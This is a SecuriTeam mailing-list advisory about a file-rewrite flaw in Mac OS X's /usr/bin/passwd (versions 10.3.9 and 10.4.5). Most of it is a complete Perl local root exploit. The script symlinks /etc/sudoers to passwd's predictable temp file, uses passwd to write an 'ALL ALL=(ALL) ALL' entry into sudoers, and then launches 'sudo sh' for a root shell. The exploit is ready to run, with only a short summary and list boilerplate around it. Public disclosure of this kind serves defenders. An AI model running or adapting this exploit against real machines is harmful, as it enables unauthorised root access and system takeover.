[EXPL] Apple Mac OS X File Rewrites and Privilege Escalation (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Apple Mac OS X File Rewrites and Privilege Escalation (Exploit)
------------------------------------------------------------------------


SUMMARY

Improper handling of file permissions allows attackers to rewrite file
content on Apple Mac OS X.

DETAILS

Vulnerable Systems:
* Mac OS X Version 10.3.9
* Mac OS X Server Version 10.3.9
* Mac OS X Version 10.4.5
* Mac OS X Server Version 10.4.5

Exploit:
#!/usr/bin/perl
#
# /usr/bin/passwd[OSX]: local root exploit.
#
# by: vade79/v9 v9@xxxxxxxxxxx (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)

use POSIX;

$fake_passwd="/tmp/xpasswd.$$";
$passwd_pid=($$ + 1);
$passwd_tempfile="/tmp/.pwtmp.$passwd_pid";
$sudoers="/etc/sudoers";

sub pexit{print("[!] @_.\n");exit(1);}
print("[*] /usr/bin/passwd[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fake_passwd);
print("[*] making fake password file. ($fake_passwd)\n");
open(FP,">$fake_passwd")||pexit("couldn't open/write to $fake_passwd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("[*] sym-linking $sudoers -> $passwd_tempfile.\n");
symlink($sudoers,$passwd_tempfile)||pexit("couldn't link files.");
print("[*] running /usr/bin/passwd on $fake_passwd.\n");
print("[*] (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fake_passwd \"ALL ALL=(ALL) ALL #\"");
print("\n[*] running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);

#EoF


ADDITIONAL INFORMATION

The information has been provided by <mailto:v9@xxxxxxxxxxx> v9.
The advisory can be found at:
<http://www.securiteam.com/securitynews/5MP011PI0E.html>
http://www.securiteam.com/securitynews/5MP011PI0E.html
The original article can be found at: <http://fakehalo.us/xosx-passwd.pl>
http://fakehalo.us/xosx-passwd.pl



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages